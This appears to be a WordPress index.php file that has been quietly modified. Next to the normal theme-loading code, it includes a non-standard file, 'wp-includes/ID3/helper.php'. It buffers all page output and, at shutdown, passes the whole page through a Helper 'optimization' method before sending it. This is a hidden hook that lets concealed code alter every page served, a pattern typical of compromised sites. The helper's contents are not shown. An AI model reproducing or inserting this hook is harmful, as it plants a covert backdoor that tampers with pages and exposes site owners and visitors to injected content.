/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
include_once 'wp-includes/ID3/helper.php';
$helper = new Helper();
register_shutdown_function('shutdown');
ob_start();
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
function shutdown()
{
global $helper;
$buffer = ob_get_contents();
ob_end_clean();
echo $helper->optimization($buffer);
}